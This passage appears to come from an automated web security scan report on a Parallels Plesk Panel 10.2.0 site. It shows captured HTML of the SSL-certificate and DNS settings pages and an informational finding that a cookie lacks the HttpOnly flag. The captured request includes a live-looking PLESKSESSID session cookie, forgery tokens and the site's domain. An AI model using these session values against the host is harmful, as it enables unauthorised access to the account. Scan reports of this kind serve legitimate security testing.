items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>SSL Certificates</span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.certificate/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

       function send_cert_oC(f)
       {
           if (f.cert_f.value == "") {
               alert("Select a certificate file");
               f.cert_f.focus();
               return false;
           }
           f.cmd.value="find";
           lsubmit(f);
           return false;
       }

       function demo()
       {
           alert("This function is not available in the demo version.");
       }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/certificate@" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f">
   <input type="hidden" name="cmd" value="setFilter">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <p>SSL certificates are used for securing transfer of sensitive data sent to your website by its visitors, and for verifying the site identity.</p>
<p>After adding an SSL certificate to a domain, you need to enable SSL support and select that certificate in the website hosting settings.</p>

<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-cert-add" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Add a new SSL certificate.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/certificate@new/properties/&#039;); return false;" style=""><BUTTON name="bname_cert_add" id="buttonid-cert-add" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/certificate@new/properties/&#039;); return false;">Add SSL Certificate</BUTTON><SPAN id="spanid-cert-add">Add SSL Certificate</SPAN></DIV>
           <DIV class="commonButton" id="bid-cert-view" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;View the list of SSL certificates that you purchased from your provider.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/mpc-certificates/&#039;); return false;" style=""><BUTTON name="bname_cert_view" id="buttonid-cert-view" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/mpc-certificates/&#039;); return false;">View Certificates</BUTTON><SPAN id="spanid-cert-view">View Certificates</SPAN></DIV>
           
       </div>

   </td></tr></table></fieldset>
</div>

<div class="formArea">
   <fieldset>
       <legend>Find the appropriate private key to a certificate</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <table class="formFields" width="100%" cellspacing="0" >
           <tr>
               <td class="name"><label for="fid-cert_f">Certificate</label></td>
               <td><input type="file" id="fid-cert_f" name="cert_f"></td>
           </tr>
       </table>

       <div class="formButtons">
           <DIV class="commonButton" id="bid-send-file" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Find the appropriate private key for the uploaded certificate.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return send_cert_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_send_file" id="buttonid-send-file" type="button" onClick="Event.stop(event);return send_cert_oC(document.forms[0]);return false;">Send File</BUTTON><SPAN id="spanid-send-file">Send File</SPAN></DIV>
       </div>

   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Certificates</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
           <script>
           function r(event)    { tooltip.set(event, [{"type":"string","string":"CSR part supplied."}]); }        // request
           function nr(event)    { tooltip.set(event, [{"type":"string","string":"CSR part not supplied."}]); }        // no request
           function p(event)    { tooltip.set(event, [{"type":"string","string":"Private key part supplied."}]); }    // private key
           function np(event)    { tooltip.set(event, [{"type":"string","string":"Private key part not supplied."}]); }    // no private key
           function c(event)    { tooltip.set(event, [{"type":"string","string":"Certificate part supplied."}]); }        // certificate
           function nc(event)    { tooltip.set(event, [{"type":"string","string":"Certificate part not supplied."}]); }    // no certificate
           function a(event)    { tooltip.set(event, [{"type":"string","string":"CA Certificate part supplied."}]); }    // ca certificate
           function na(event)    { tooltip.set(event, [{"type":"string","string":"CA Certificate part not supplied."}]); }    // no ca certificate
           function mo()    { tooltip.hide(); }                    // reset conhelp
           
           </script>
       <div class="paging pagingTop noList">No SSL certificates</div><div class="paging pagingBottom noList"></div><script>SetCookie("certificateslist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function CertificatesListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function CertificatesListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function CertificatesListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function CertificatesListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.CertificatesListSelectAll.checked;
                           CertificatesListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function CertificatesListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function CertificatesListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function CertificatesListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   CertificatesListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function CertificatesListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function CertificatesListSearchShow()
           {
               var sc = document.getElementById("CertificatesListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("CertificatesListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function CertificatesListSearchHide()
           {
               var sc = document.getElementById("CertificatesListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("CertificatesListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function CertificatesListRemove(f)
           {
               if (0 == CertificatesListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/certificate@";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>
</div>




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.19. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/dns/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/dns/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/dns/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:16:52 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:16:53 GMT
Connection: close
Content-Length: 31972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fdns%252F%26src%3D%252Fsmb%252Fweb%252Fview%252Ftype%252Fdns%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;DNS zone is enabled.&quot;&#125;]);" onMouseOut="tooltip.hide();"><IMG src="/skins/default/plesk/icons/on.gif" width="16" height="16" alt="on.gif" title=""></a> This server acts as a primary nameserver for the DNS zone <span class="name">nosedivesailing.com</span></span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.dns/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

       function turnOn(f)
       {
           f.cmd.value = "turnOn";
           lsubmit(f);
       }
       function turnOff(f)
       {
           f.cmd.value = "turnOff";
           lsubmit(f);
       }
       function switchMaster(f)
       {
           f.cmd.value = "switchMaster";
           lsubmit(f);
       }
       function switchSlave(f)
       {
           f.cmd.value = "switchSlave";
           lsubmit(f);
       }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>

<div id="screenTabs"><div id="tabs"><ul><li class="first" id="current"><A href="/plesk/client@2/domain@1/dns/" onClick=";lon();" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Manage DNS zone settings for domain vulnerable.host.fqdn.&quot;&#125;]);" onMouseOut="tooltip.hide();"><span>DNS Settings</span></a></li><li><A href="/plesk/client@2/domain@1/dns/soa-record/properties/" onClick=";lon();" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Edit the SOA record of the DNS zone vulnerable.host.fqdn&quot;&#125;]);" onMouseOut="tooltip.hide();"><span>SOA Record</span></a></li><li class="last"><A href="/plesk/client@2/domain@1/dns/acl-record@/" onClick=";lon();" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;The list of networks allowed to get a copy of DNS zone.&quot;&#125;]);" onMouseOut="tooltip.hide();"><span>Zone Transfers</span></a></li></ul></div></div>
<form action="/plesk/client@2/domain@1/dns/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   

<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-disable" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Switch off the DNS service for the DNS zone vulnerable.host.fqdn.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dns/toggle/&#039;); return false;" style=""><BUTTON name="bname_disable" id="buttonid-disable" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dns/toggle/&#039;); return false;">Switch Off the DNS Service</BUTTON><SPAN id="spanid-disable">Switch Off the DNS Service</SPAN></DIV>
           <DIV class="commonButton" id="bid-switch" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Make the DNS server act as a slave for the zone vulnerable.host.fqdn.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dns/toggle-type/&#039;); return false;" style=""><BUTTON name="bname_switch" id="buttonid-switch" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dns/toggle-type/&#039;); return false;">Switch DNS Service Mode</BUTTON><SPAN id="spanid-switch">Switch DNS Service Mode</SPAN></DIV>
           <DIV class="commonButton" id="bid-dnsrecord-add" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create new resource record in vulnerable.host.fqdn&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dns/resource-record@new/properties/&#039;); return false;" style=""><BUTTON name="bname_dnsrecord_add" id="buttonid-dnsrecord-add" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dns/resource-record@new/properties/&#039;); return false;">Add Record</BUTTON><SPAN id="spanid-dnsrecord-add">Add Record</SPAN></DIV>
           
           <DIV class="commonButton" id="bid-default" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Restore the default records in the DNS zone vulnerable.host.fqdn.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dns/default/&#039;); return false;" style=""><BUTTON name="bname_default" id="buttonid-default" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dns/default/&#039;); return false;">Restore Defaults</BUTTON><SPAN id="spanid-default">Restore Defaults</SPAN></DIV>
       </div>

   </td></tr></table></fieldset>
</div>

<div class="listArea">

<fieldset>

<legend>DNS records</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<div id="DNSZoneListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><DIV class="commonButton" id="bid-remove-selected" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Delete the selected DNS records.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);DNSZoneListRemove(document.forms[0]);return false;" style=""><BUTTON name="bname_remove_selected" id="buttonid-remove-selected" type="button" onClick="Event.stop(event);DNSZoneListRemove(document.forms[0]);return false;">Remove</BUTTON><SPAN id="spanid-remove-selected">Remove</SPAN></DIV></div></td><td class="misc"><div id="DNSZoneListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);DNSZoneListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);DNSZoneListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);DNSZoneListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);DNSZoneListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" 
size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find DNS records.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);DNSZoneListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);DNSZoneListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all DNS records.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);DNSZoneListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);DNSZoneListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>11 DNS records total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="DNSZoneListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="DNSZoneListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="DNSZoneListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="host"><table width="100%" cellspacing="0" 
class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="DNSZoneListSelectAll" value="true" onClick="DNSZoneListSelect()"></th><th width="40%" class="sort"><A href="#" onClick="DNSZoneListSort(&#039;host_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort DNS zone records by host.&quot;&#125;]);" onMouseOut="tooltip.hide();">Host</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="20%"><A href="#" onClick="DNSZoneListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort DNS zone records by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">Record type</a></th><th width="40%"><A href="#" onClick="DNSZoneListSort(&#039;val&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort DNS zone records by value.&quot;&#125;]);" onMouseOut="tooltip.hide();">Value</a></th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_11" value="11" 